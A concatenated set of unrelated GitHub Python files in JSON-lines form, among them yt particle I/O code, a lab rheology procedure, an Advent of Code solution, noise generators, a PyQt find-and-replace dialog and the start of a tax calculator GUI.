rv\n\n rv = {f: np.array([]) for f in fields}\n for chunk in chunks:\n for grid in chunk.objs:\n for ftype, fname in fields:\n data = self._read_particles(grid, fname)\n rv[ftype, fname] = np.concatenate((data, rv[ftype, fname]))\n return rv\n\n def _read_particles(self, grid, field):\n \"\"\"\n parses the Orion Star Particle text files\n\n \"\"\"\n\n particles = []\n\n if grid.NumberOfParticles == 0:\n return np.array(particles)\n\n def read(line, field):\n entry = line.strip().split(\" \")[self.particle_field_index[field]]\n return float(entry)\n\n try:\n lines = self._cached_lines\n for num in grid._particle_line_numbers:\n line = lines[num]\n particles.append(read(line, field))\n return np.array(particles)\n except AttributeError:\n fn = self.particle_filename\n with open(fn) as f:\n lines = f.readlines()\n self._cached_lines = lines\n for num in grid._particle_line_numbers:\n line = lines[num]\n particles.append(read(line, field))\n return np.array(particles)\n","repo_name":"yt-project/yt","sub_path":"yt/frontends/boxlib/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":10522,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"3"} +{"seq_id":"34963692516","text":"import socket\nimport random\n#HOST E PORTA\n#myhost = '127.0.0.1' \nmyhost = '192.168.0.106'\nmyport = 3003 \n\n#criar server\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:\n server.bind((myhost, myport))\n server.listen(5)\n\n #config conexões\n conexao, endereco = server.accept()\n with conexao:\n print('[*] servidor conectado por', endereco)\n while True:\n data = conexao.recv(1024)\n if data == b'y':\n randnum = random.randrange(100)\n byt = bytes([randnum])\n print(byt)\n conexao.send(byt)\n else: break\n if not data: break\n \n \n","repo_name":"Tarsisnbs/estagio_gmicro","sub_path":"uPPG/outros scripts/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34057896962","text":"import argparse, os.path\nfrom datetime import datetime\nimport numpy as np\nfrom contextlib import closing, ExitStack\nfrom scipy.optimize import curve_fit\nfrom tensiometre.dt3100 import DT3100, recover\nfrom tensiometre.mpc385 import MPC385\nfrom tensiometre import mechtest3sensors\nfrom tensiometre.chirp import optimal_chirp, load_chirp_moduli, fit_powerlaw_modulus\nfrom tensiometre.show_measurements import show_measurement\n\n\ndef measure_state():\n with ExitStack() as stack:\n sensors = [stack.enter_context(closing(DT3100(f'169.254.{i+3:d}.100'))) for i in range(3)]\n mpc = stack.enter_context(closing(MPC385()))\n return mechtest3sensors.State().read(sensors, mpc, ab2xy)\n\nfrom scipy.signal import chirp\ndef optimal_chirp(t, amplitude=10, f1=1e-2, f2=1, T=66, r=0.1, delay=4):\n td = np.mod(t,T+delay)\n tt = td-delay\n chrp = chirp(tt, f1, T, f2, phi=90, method='logarithmic')\n chrp = np.where(\n tt<0, 0, np.where(\n 2*tt < r*T,\n np.cos(np.pi/r*(tt/T-r/2))**2 * chrp,\n np.where(\n tt/T > 1 - r/2,\n np.cos(np.pi/r*(tt/T-1+r/2))**2 * chrp,\n chrp\n )\n )\n )\n return amplitude*chrp\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Procedure to apply a constant stress while maintaining a gap of 100µm.')\n parser.add_argument('stress', type=float, help = \"\"\"Stress to apply, in units of the measured modulus.\"\"\")\n parser.add_argument('calibrationfilename', type=str, help='path and name of the ab2xy 
calibration file. Expects a .npy.')\n parser.add_argument('--gap', type=float, default=100, help='Gap to open from the initial (touching) position. Default 100µm.')\n parser.add_argument('--fmin', type=float, default=0.01, help='Lowest frequency of the chirp in X during gelation (Hz). Default 0.01Hz.')\n parser.add_argument('--fmax', type=float, default=1, help='Highest frequency of the chirp in X during gelation (Hz). Default 1Hz.')\n parser.add_argument('--ampl', type=float, default=3, help='Amplitude of the chirp in X during gelation (µm).')\n parser.add_argument('--T', type=float, default=198, help='Duration of the chirps in X during gelation (s)')\n parser.add_argument('--delay', type=float, help='Delay between the chirps in X during gelation (s). By default T/16.')\n\n args = parser.parse_args()\n if args.delay is None:\n args.delay = args.T / 16\n ab2xy = np.load(args.calibrationfilename)\n\n recover(), recover('169.254.4.100'), recover('169.254.5.100')\n with closing(MPC385()) as actuator:\n print(actuator.update_current_position())\n\n input(f\"Please move to just touching the bottom. Enter when OK.\")\n touching_state = measure_state()\n now = datetime.now().strftime('%Y%m%d_%H%M')\n touching_state.save(f'touching_{now}.npy')\n\n now = datetime.now().strftime('%Y%m%d_%H%M')\n print(f\"{now}: Lifting up by {args.gap} µm to setup the initial gap size. Maintain 60s to ensure steady state.\")\n mechtest3sensors.move_to_constant_positions(\n ab2xy,\n outnames = [f'positon_from_bottom_100um_{now}.raw'],\n dxs=[0], dys=[100],\n durations=[60],\n kp=0.1,\n state0=touching_state\n )\n force_free = measure_state()\n now = datetime.now().strftime('%Y%m%d_%H%M')\n force_free.save(f'force_free_{now}.npy')\n print(f\"position wrt touching: {force_free.head_to_ground - touching_state.head_to_ground}\")\n print(f\"deflection wrt touching: {force_free.deflection - touching_state.deflection}\")\n\n functions = [\n lambda t: optimal_chirp(\n t, amplitude=args.ampl, T=args.T, delay=args.delay,\n f1=args.fmin, f2=args.fmax,\n ),\n lambda t: 0\n ]\n now = datetime.now().strftime('%Y%m%d_%H%M')\n print(f\"{now}: Maintain the gap size while chirping in shear with amplitude {args.ampl} microns, duration {args.T}s, delay {args.delay} s.\")\n chirpname = f'maintain_gap_100um_armchirpX_{now}.raw'\n mechtest3sensors.timedep_armX_positionY(\n ab2xy,\n chirpname,\n functions,\n duration=3600, kp=[1,0.01], ki=[0,1e-5],\n moveback=False, state0=force_free\n )\n # now = datetime.now().strftime('%Y%m%d_%H%M')\n # print(f\"{now}: Maintain the gap size for 1h while oscillating in shear 2µm 0.1Hz.\")\n # mechtest3sensors.oscillating_position(\n # ab2xy,\n # f'maintain_gap_100um_oscillateX_{now}.raw',\n # amplitudex = args.ampl, amplitudey=0, freqx=args.freq, freqy=0,\n # duration=3600, kp=[0.1,0.01], ki=[0,1e-5],\n # moveback=False, state0=force_free\n # )\n # print(f\"{now}: Maintain the gap size for 1h.\")\n # mechtest3sensors.move_to_constant_positions(\n # ab2xy,\n # outnames = [f'maintain_gap_100um_{now}.raw'],\n # dxs=[0], dys=[100],\n # durations=[3600],\n # kp=0.01, ki=1e-5,\n # state0=touching_state\n # )\n recover(), recover('169.254.4.100'), recover('169.254.5.100')\n with closing(MPC385()) as actuator:\n print(actuator.update_current_position())\n after_gelation = measure_state()\n now = datetime.now().strftime('%Y%m%d_%H%M')\n after_gelation.save(f'after_gelation_{now}.npy')\n print(f\"position: {after_gelation.head_to_ground - touching_state.head_to_ground}\")\n print(f\"deflection wrt force free: 
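# [Editorial sketch] optimal_chirp above builds a log-swept chirp whose first and last fraction r of each period are tapered by cosine-squared windows, preceded by a silent delay. A quick preview on a hypothetical time grid:\ndef _sketch_chirp_preview():\n    import numpy as np\n    t = np.linspace(0, 70, 7001)  # one 66 s chirp plus its 4 s lead-in delay\n    return optimal_chirp(t, amplitude=10, f1=1e-2, f2=1, T=66, r=0.1, delay=4)\n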
{after_gelation.deflection - force_free.deflection}\")\n\n now = datetime.now().strftime('%Y%m%d_%H%M')\n print(f\"{now}: Estimate shear modulus at 1Hz from the last chirp, extrapolating the power law.\")\n freqs, Gs = load_chirp_moduli(chirpname, T=args.T, delay=args.delay)\n alpha, modulus = fit_powerlaw_modulus(freqs, Gs[-1], M=190)\n print(f'Module deflection vs displacement @1Hz: {modulus}. Power alpha={alpha}')\n\n\n # now = datetime.now().strftime('%Y%m%d_%H%M')\n # print(f\"{now}: Estimate shear modulus of the gel by step strains<3µm. Repeated 3 times.\")\n # for k in range(1,4):\n # dxs = np.arange(0,10,3).astype(float)\n # dxs = np.append(dxs, 0.0)\n # dys = np.zeros_like(dxs)\n # outnames = ['shear%d_%d.raw'%(k,dx) for dx in dxs]\n # outnames[-1] = 'moveback_original_%d.raw'%k\n # durations = [60]*len(dxs)\n # durations[-1] = 6*60\n # mechtest3sensors.move_to_constant_positions(\n # ab2xy,\n # outnames,\n # dxs, dys,\n # durations,\n # kp=0.1, moveback=False,\n # state0=after_gelation)\n # print(f'Linear rheology number {k} at time {180+(k-1)*10}')\n # dXs = np.zeros(len(dxs))\n # dYs = np.zeros(len(dxs))\n # stdX = np.zeros(len(dxs))\n # stdY = np.zeros(len(dxs))\n # for i, outname in enumerate(outnames):\n # data = np.fromfile(outname)\n # t, x, y, X, Y, y_ag = data.reshape((len(data)//6,6)).T\n # y_hg = Y + y_ag\n # avgX = X[-100:].mean()\n # avgY = Y[-100:].mean() #(Y[-100:] + 16*y_ag[-100:] - y[-100:]).mean()\n # stdX[i] = np.std(X[-100:])\n # stdY[i] = np.std(Y[-100:])#np.std(Y[-100:]+ 16*y_ag[-100:] - y[-100:])\n # dXs[i] = avgX - after_gelation.deflection[0]\n # dYs[i] = avgY - after_gelation.deflection[1]\n #\n # np.savetxt((datetime.now().strftime('%Y%m%d_%H%M_stressvsshear_method2.txt')),(dxs,dXs,dYs,stdX,stdY))\n # #Stress strain linear rheology for linear regime\n # a,b = curve_fit(lambda u,a: u*a, dxs, dXs)\n # module = a[0] # unit µm/µm\n # print(f'Module deflection vs displacement: {module}')\n\n # Again check the change w.r.t the inital set position(Xinit,Yinit) and initial zero stress deflection\n # after_linear_rheology = measure_state()\n # now = datetime.now().strftime('%Y%m%d_%H%M')\n # after_linear_rheology.save(f'after_linear_rheology_{now}.npy')\n # print(f\"position: {after_linear_rheology.head_to_ground - touching_state.head_to_ground}\")\n # print(f\"deflection wrt force free: {after_linear_rheology.deflection - force_free.deflection}\")\n\n now = datetime.now().strftime('%Y%m%d_%H%M')\n print(f\"{now}: Apply the constant stress\")\n h = (after_gelation.head_to_ground - touching_state.head_to_ground)[1]\n defl = -args.stress*modulus*h # calculated from the linear rheology\n print(f'We plan to apply a deflection of {defl:0.3f} um')\n #Present sensor readings\n xy2ab = np.linalg.inv(ab2xy)\n a0, b0 = xy2ab @ after_gelation.deflection\n #what is the condition on Delta X to keep sensor a in range?\n #0 < a0 + Delta a < 800\n #0 < a0 + xy2ab[0,0] * Delta X + xy2ab[0,1] * Delta Y < 800\n #here we suppose that there is no Delta Y\n #0 < a0 + xy2ab[0,0] * Delta X < 800\n #minimum and maximum deflexion depend on the sign of the xy2ab matrix elements\n if xy2ab[0,0]>0:\n mindefl = -a0/xy2ab[0,0]\n maxdefl = (800-a0)/xy2ab[0,0]\n else:\n mindefl = (800-a0)/xy2ab[0,0]\n maxdefl = -a0/xy2ab[0,0]\n #same for sensor b and combine the two conditions\n if xy2ab[1,0]>0:\n mindefl = max(mindefl, -b0/xy2ab[1,0])\n maxdefl = min(maxdefl, (800-b0)/xy2ab[1,0])\n else:\n mindefl = max(mindefl, (800-b0)/xy2ab[1,0])\n maxdefl = min(maxdefl, -b0/xy2ab[1,0])\n #security 
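# [Editorial sketch] The saturation applied below is a scalar clamp written with numpy:\ndef _sketch_clamp(value, lo, hi):\n    import numpy as np\n    return np.maximum(lo, np.minimum(hi, value))  # equivalent to min(max(value, lo), hi)\n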
coefficient of 0.9\n mindefl *=0.9\n maxdefl *=0.9\n print(f'Deflection must be between {mindefl:0.3f} um and {maxdefl:0.3f} um')\n #saturates deflection\n defl = np.maximum(mindefl, np.minimum(maxdefl, defl))\n print(f'The applied deflection will be {defl:0.3f} um')\n now = datetime.now().strftime('%Y%m%d_%H%M')\n outname = f'add_constant_deflectionX{defl:0.3f}_stay_constant_positiony_{now}.raw'\n mechtest3sensors.add_constant_deflectionX_stay_constant_positiony(\n outname,\n ab2xy,\n kp=[0.2,0.1], ki=[0.001,0.001], kd =[0.0,0.0],\n dX=defl,\n moveback= True, state0 = force_free, maxYdispl = 300\n )\n after_creep = measure_state()\n now = datetime.now().strftime('%Y%m%d_%H%M')\n after_creep.save(f'after_creep_{now}.npy')\n print(f\"position: {after_creep.head_to_ground - touching_state.head_to_ground}\")\n print(f\"deflection wrt force free: {after_creep.deflection - force_free.deflection}\")\n","repo_name":"MathieuLeocmach/tensiometre","sub_path":"tensiometre/procedure_constant_gap_gelation_creep.py","file_name":"procedure_constant_gap_gelation_creep.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"9154576291","text":"if __name__ == \"__main__\":\n with open(\"Input.txt\") as f:\n trees = []\n for line in f:\n line = line.replace(\"\\n\", \"\")\n treeRow = []\n for tree in line:\n treeRow.append(int(tree))\n\n trees.append(treeRow)\n\n visibleTreeCount = 0\n visibleTrees = []\n for rowIndex, row in enumerate(trees):\n for columnIndex, treeHeight in enumerate(row):\n # Iterate each tree, then approach from each direction to see\n # if it's visible\n # Edge trees are always visible\n if rowIndex == 0 or columnIndex == 0 or rowIndex == len(trees) - 1 or columnIndex == len(trees[0]) - 1:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n else:\n # First check to the left\n for compareTreeHeight in trees[rowIndex][:columnIndex]:\n if compareTreeHeight >= treeHeight:\n break\n else:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n\n # then the right\n for compareTreeHeight in trees[rowIndex][columnIndex + 1:]:\n if compareTreeHeight >= treeHeight:\n break\n else:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n\n # then from above\n for compareTreeHeight in trees[:rowIndex]:\n if compareTreeHeight[columnIndex] >= treeHeight:\n break\n else:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n\n # and finally from below\n for compareTreeHeight in trees[rowIndex + 1:]:\n if compareTreeHeight[columnIndex] >= treeHeight:\n break\n else:\n visibleTreeCount += 1\n visibleTrees.append([rowIndex, columnIndex])\n continue\n \n print(visibleTrees)\n print(visibleTreeCount)","repo_name":"Jonnyvb/Advent-of-code-2022","sub_path":"Day 8/Part-1.py","file_name":"Part-1.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20976634016","text":"#===============================================================================\r\n# Filename: Noise.py\r\n# Author: Aaron Thompson\r\n# Date Created: 3/26/2021\r\n# Last Updated: 3/29/2021\r\n#\r\n# Description: \r\n#===============================================================================\r\nimport numpy as np\r\nimport cupy as cp\r\nimport math\r\nfrom numba import vectorize\r\nfrom numba import 
jit\r\n#-------------------------------------------------------------------------------\r\n#PARAMETERS\r\nN = 10**6\r\n\r\n#CONSTANTS\r\nSQRT_PI = math.sqrt(math.pi)\r\nSQRT_2DIVPI = math.sqrt(2/math.pi)\r\n\r\n#COMPUTATION\r\nt0 = 0\r\na0 = 0\r\nn = np.arange(1, N+1)\r\ncoeff = 0\r\nsin = 0\r\n\r\n#General Functions\r\n#-------------------------------------------------------------------------------\r\ndef GenerateNoise(length, type=\"white\"):\r\n type = type.lower()\r\n if(type == \"white\"):\r\n return GenerateWhiteNoise(length)\r\n elif(type == \"brown\"):\r\n return GenerateBrownNoise(length)\r\n elif(type == \"pink\"):\r\n return GeneratePinkNoise(length)\r\n else:\r\n return None\r\n\r\ndef GenerateNoiseFast(length, nSamples=4, sampleLength=8820, type=\"white\"):\r\n noise = GenerateNoise(nSamples * sampleLength, type)\r\n samples = np.split(noise, nSamples)\r\n \r\n n = math.ceil(length/sampleLength)\r\n indices = np.random.randint(0, nSamples, n)\r\n noise = np.copy(samples[indices[0]])\r\n print(indices)\r\n for i in range(1,n):\r\n noise = np.append(noise, samples[indices[i]]) # assign back: np.append returns a new array\r\n\r\n return np.resize(noise, length)\r\n\r\n#Brown Noise\r\n#-------------------------------------------------------------------------------\r\ndef GenerateBrownNoise(length):\r\n t = np.linspace(0, math.pi, length)\r\n an = np.random.normal(0, 1, N+1)\r\n\r\n sums = np.empty(length)\r\n for i in range(length):\r\n sequence = BrownSequence(an[1:], n, t[i])\r\n sums[i] = np.sum(sequence)\r\n\r\n return (an[0]/SQRT_PI) * t + sums\r\n\r\n@vectorize(['float64(float64, int32, float64)'], target='cuda')\r\ndef BrownSequence(a, n, t):\r\n return (a/n) * SQRT_2DIVPI * math.sin(n * t)\r\n\r\n#White Noise\r\n#-------------------------------------------------------------------------------\r\n\r\ndef GenerateWhiteNoise(length):\r\n t = np.linspace(0, math.pi, length)\r\n an = np.random.normal(0, 1, N+1)\r\n\r\n sums = np.empty(length)\r\n for i in range(length):\r\n sequence = WhiteSequence(an[1:], n, t[i])\r\n sums[i] = np.sum(sequence)\r\n\r\n return ((an[0]/SQRT_PI) + sums)/(N *(10**-3))\r\n\r\n@vectorize(['float64(float64, int32, float64)'], target='cuda')\r\ndef WhiteSequence(a, n, t):\r\n return a * SQRT_2DIVPI * math.cos(n * t)\r\n\r\n#Pink Noise\r\n#-------------------------------------------------------------------------------\r\ndef GeneratePinkNoise(length, frequency=44100, alpha=1.1):\r\n noise = GenerateWhiteNoise(length)\r\n return PinkFilter(noise, frequency, alpha)\r\n\r\n@vectorize(['float64(float64, int32, float64)'])\r\ndef PinkFilter(noise, frequency, alpha):\r\n return noise / (frequency**(alpha/2))","repo_name":"aamithompson/NoiseGenerator","sub_path":"Noise.py","file_name":"Noise.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6314479743","text":"#Trains basic perceptron on everything and finds weights \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd \r\nimport sklearn.model_selection\r\nimport sklearn.linear_model\r\nimport sklearn.preprocessing\r\n\r\nBaseline1 = [\"Event\",\"LapTime\", \"NextLapTime\",\"LapNumber\", \"PLapTime\", \"PPLapTime\", \"PPPLapTime\"]\r\nIdentity = [\"DriverNumber\", \"Team\"] \r\nTyre = [\"Compound\", \"TyreLife\", \"FreshTyre\"] \r\nSectorTimes = [\"S1Time\", \"S2Time\", \"S3Time\"] \r\nSessionTimes = [\"S1STime\", \"S2STime\", \"S3STime\"] \r\nRecordTimes = [\"SpeedI2\", \"SpeedFL\", \"SpeedST\"] \r\nLapStatus = [\"IsPersonalBest\", 
\"Position\", \"Deleted\", \"TrackStatus\"]\r\n\r\n\r\n\r\nerrors = []\r\n\r\nfor j in range(0,3):\r\n\r\n error = 0 \r\n\r\n for i in range(10):\r\n\r\n groups = Baseline1 + Identity + Tyre + SectorTimes + SessionTimes + RecordTimes + LapStatus\r\n totalFrame = pd.read_csv(\"./raceData2019MultiplePrevLaps.csv\").dropna()\r\n data = totalFrame[groups]\r\n\r\n X = (data.loc[:, data.columns != 'NextLapTime']).to_numpy()\r\n Y = (data.loc[:, data.columns == 'NextLapTime']).to_numpy()\r\n\r\n X = sklearn.preprocessing.PolynomialFeatures(degree=j).fit_transform(X)\r\n X_train, X_test, Y_train, Y_test = sklearn.model_selection.train_test_split(X, Y, test_size=0.2, shuffle=True,)\r\n X_train, X_eval, Y_train, Y_eval = sklearn.model_selection.train_test_split(X_train, Y_train, test_size=0.25, shuffle=True,)\r\n #\r\n\r\n perceptron = sklearn.linear_model.Ridge(tol=0.00001)\r\n perceptron.fit(X_train, Y_train)\r\n Y_predict = perceptron.predict(X_test)\r\n Y_eval_predict = perceptron.predict(X_eval)\r\n\r\n error += np.sqrt(np.mean((Y_eval-Y_eval_predict)**2))\r\n\r\n errors.append(error/10)\r\n\r\n\r\nplt.title(\"Error Vs Degree of Polynomial Features\")\r\nplt.xlabel(\"Degree of Polynomial Features\")\r\nplt.ylabel(\"Error\")\r\nplt.plot(range(0,3),errors)\r\nplt.show()\r\n\r\nprint(errors)","repo_name":"dzarezankova/syde-522-final-proj","sub_path":"addMoreFeatures.py","file_name":"addMoreFeatures.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37797887354","text":"import _wingpio as gpio\r\nimport time\r\nfrom pin import PinController\r\n\r\nclass BoardController(object):\r\n\r\n def __init__(self):\r\n self._yellowPin = PinController(5, 'yellow')\r\n self._redPin = PinController(6, 'red')\r\n self._counter = 0\r\n\r\n def start(self):\r\n while True:\r\n self._counter = self._counter + 1\r\n if(self._counter % 2 == 0):\r\n if(self._redPin.value == gpio.HIGH):\r\n self._redPin.value = gpio.LOW\r\n else:\r\n self._redPin.value = gpio.HIGH\r\n else:\r\n if self._yellowPin.value == gpio.HIGH:\r\n self._yellowPin.value = gpio.LOW\r\n else:\r\n self._yellowPin.value = gpio.HIGH\r\n\r\n time.sleep(0.5)","repo_name":"ppopadiyn/win10-iot-blink-leds","sub_path":"src/python/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1337915270","text":"from math import pow \nfrom math import pi\nverdadero = pow(pi,4)/90\nn = 10000\nant = 0\ni = n\nprint(\" n verdadero aprox error et error ea\")\nwhile (1):\n if(i>n): \n break\n serie = ant + (1/pow(i,4))\n et= 100*(verdadero-serie)/verdadero\n ea=100*(serie-ant)/serie\n ant= serie\n print(\" %d %f %f %f %f \" %(i,verdadero,serie,et,ea))\n i=i-1; \n","repo_name":"Cruzme12/TRABAJOSS","sub_path":"Serie.py","file_name":"Serie.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9349821871","text":"#!/usr/bin/env python\r\n# Copyright (c) 2008 Qtrac Ltd. All rights reserved.\r\n# This program or module is free software: you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License as published\r\n# by the Free Software Foundation, either version 2 of the License, or\r\n# version 3 of the License, or (at your option) any later version. 
It is\r\n# provided for educational purposes and is distributed in the hope that\r\n# it will be useful, but WITHOUT ANY WARRANTY; without even the implied\r\n# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See\r\n# the GNU General Public License for more details.\r\n\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\nfrom __future__ import unicode_literals\r\nfrom future_builtins import *\r\n\r\nimport re\r\nfrom PyQt4.QtCore import (Qt, SIGNAL, pyqtSignature)\r\nfrom PyQt4.QtGui import (QApplication, QDialog)\r\nimport ui_findandreplacedlg\r\n\r\nMAC = True\r\ntry:\r\n from PyQt4.QtGui import qt_mac_set_native_menubar\r\nexcept ImportError:\r\n MAC = False\r\n\r\n\r\n# This class should be a subclass of both QDialog class and ui_xxxxx class.\r\nclass FindAndReplaceDlg(QDialog,\r\n ui_findandreplacedlg.Ui_FindAndReplaceDlg):\r\n\r\n def __init__(self, text, parent=None):\r\n # The clause below means QDialog.__init__(self, parent)\r\n super(FindAndReplaceDlg, self).__init__(parent)\r\n self.__text = unicode(text)\r\n self.__index = 0\r\n # setupUi(self) will do two things, one:\r\n # 1. create the widgets and layout which is defined in Qt Designer.\r\n # 2. calls QtCore.QMetaObject.connectSlotsByName(), a static method that creates signal-slot connections between form\r\n # widget signals and methods in our subclass that follow a particular naming convention.\r\n # Any method whose name is of the form on_widgetName_signalName will have the named widget's named signal connected to it.\r\n # In this case, it is 'on_findLineEdit_textEdited' method below.\r\n # That is the widget named 'findLineEdit' will auto connect a signal 'textEdited(text)' to the slot 'on_findLineEdit_textEdited(self, text)'\r\n \r\n # For the option 2 above, I personally, hope to use the traditional way to write connect method myself.\r\n self.setupUi(self)\r\n if not MAC:\r\n self.findButton.setFocusPolicy(Qt.NoFocus)\r\n self.replaceButton.setFocusPolicy(Qt.NoFocus)\r\n self.replaceAllButton.setFocusPolicy(Qt.NoFocus)\r\n self.closeButton.setFocusPolicy(Qt.NoFocus)\r\n self.updateUi()\r\n\r\n\r\n @pyqtSignature(\"QString\")\r\n def on_findLineEdit_textEdited(self, text):\r\n self.__index = 0\r\n self.updateUi()\r\n\r\n\r\n def makeRegex(self):\r\n findText = unicode(self.findLineEdit.text())\r\n if unicode(self.syntaxComboBox.currentText()) == \"Literal\":\r\n findText = re.escape(findText)\r\n flags = re.MULTILINE|re.DOTALL|re.UNICODE\r\n if not self.caseCheckBox.isChecked():\r\n flags |= re.IGNORECASE\r\n if self.wholeCheckBox.isChecked():\r\n findText = r\"\\b{0}\\b\".format(findText)\r\n return re.compile(findText, flags)\r\n\r\n\r\n @pyqtSignature(\"\")\r\n def on_findButton_clicked(self):\r\n regex = self.makeRegex()\r\n match = regex.search(self.__text, self.__index)\r\n if match is not None:\r\n self.__index = match.end()\r\n self.emit(SIGNAL(\"found\"), match.start())\r\n else:\r\n self.emit(SIGNAL(\"notfound\"))\r\n \r\n \r\n @pyqtSignature(\"\")\r\n def on_replaceButton_clicked(self):\r\n regex = self.makeRegex()\r\n self.__text = regex.sub(unicode(self.replaceLineEdit.text()),\r\n self.__text, 1)\r\n \r\n\r\n @pyqtSignature(\"\")\r\n def on_replaceAllButton_clicked(self):\r\n regex = self.makeRegex()\r\n self.__text = regex.sub(unicode(self.replaceLineEdit.text()),\r\n self.__text)\r\n \r\n\r\n def updateUi(self):\r\n enable = not self.findLineEdit.text().isEmpty()\r\n self.findButton.setEnabled(enable)\r\n self.replaceButton.setEnabled(enable)\r\n 
        self.replaceAllButton.setEnabled(enable)\r\n\r\n\r\n    def text(self):\r\n        return self.__text\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    import sys\r\n\r\n    text = \"\"\"US experience shows that, unlike traditional patents,\r\nsoftware patents do not encourage innovation and R&D, quite the\r\ncontrary. In particular they hurt small and medium-sized enterprises\r\nand generally newcomers in the market. They will just weaken the market\r\nand increase spending on patents and litigation, at the expense of\r\ntechnological innovation and research. Especially dangerous are\r\nattempts to abuse the patent system by preventing interoperability as a\r\nmeans of avoiding competition with technological ability.\r\n--- Extract quoted from Linus Torvalds and Alan Cox's letter\r\nto the President of the European Parliament\r\nhttp://www.effi.org/patentit/patents_torvalds_cox.html\"\"\"\r\n\r\n    def found(where):\r\n        print(\"Found at {0}\".format(where))\r\n\r\n    def nomore():\r\n        print(\"No more found\")\r\n\r\n    app = QApplication(sys.argv)\r\n    form = FindAndReplaceDlg(text)\r\n    form.connect(form, SIGNAL(\"found\"), found)\r\n    form.connect(form, SIGNAL(\"notfound\"), nomore)\r\n    form.show()\r\n    app.exec_()\r\n    print(form.text())\r\n\r\n","repo_name":"ghosert/VimProject","sub_path":"pyqt/book_samples/chap07/findandreplacedlg.py","file_name":"findandreplacedlg.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"3"}
+{"seq_id":"9147614567","text":"'''Created by Steffny Marif Bill\r\non 15 March 2019'''\r\n\r\nfrom tkinter import*\r\nimport tkinter.messagebox\r\nimport re  # needed by the only_num validator below\r\n\r\n\r\nclass CalTax:\r\n\r\n    def __init__(self, root):\r\n        self.root = root\r\n        self.root.title('PNG Income Tax Calculator - 2012')\r\n        self.root.geometry(\"800x3800+0+0\")\r\n        self.root.maxsize(height=500, width=500) #set fixed size for window\r\n\r\n        frame1 = Frame(self.root, padx=20, bd=16)\r\n        frame1.grid()\r\n\r\n        frame2 = Frame(frame1, width=600, height=100, padx=12, bd=10, relief=RIDGE)\r\n        frame2.grid(row=0, column=0)\r\n\r\n        frame3 = Frame(frame1, width=200, height=50, padx=0, pady=0, bd=10, relief=RIDGE)\r\n        frame3.grid(row=1, column=0)\r\n\r\n        #========================================================Variables & Entry & Labels===============================================================================================\r\n\r\n        amt = DoubleVar()\r\n        resultThreeDep = DoubleVar()\r\n        resultTwoDep = DoubleVar()\r\n        resultOneDep = DoubleVar()\r\n        resultNilDep = DoubleVar()\r\n        resultNonRes = DoubleVar()\r\n\r\n        #check if input is float or valid number\r\n        def only_num(string):\r\n            regex = re.compile(r\"(\\+|\\-)?[0-9.]*$\")\r\n            result = regex.match(string)\r\n            return(string ==\"\" or (string.count('+') <= 1\r\n                                   and string.count('-') <=1\r\n                                   and string.count('.') <=1\r\n                                   and result is not None\r\n                                   and result.group(0) != \"\"))\r\n        \r\n\r\n        self.lblGrossAmt = Label(frame2, text='Gross Amount', font=('arial',10,'bold'), bd=12)\r\n        self.lblGrossAmt.grid(row=0, column=0)\r\n        validation = frame2.register(only_num)\r\n        self.txtGrossAmt = Entry(frame2, textvariable=amt, validate=\"key\", validatecommand=(validation, '%P'), bg='light blue', font=('arial',10,'bold'), bd=12) # input field\r\n        self.txtGrossAmt.focus()#set cursor at input field\r\n        self.txtGrossAmt.grid(row=0, column=1)\r\n        \r\n        self.lblThreeDep = Label(frame2, text='Tax on 3 Deps', font=('arial',10,'bold'), bd=12)\r\n        self.lblThreeDep.grid(row=1, column=0)\r\n        self.txtThreeDep = Entry(frame2, 
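# NOTE (added comment): state=DISABLED below makes this Entry a read-only\r\n                                         # display for the computed tax; textvariable binds it to resultThreeDep\r\n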
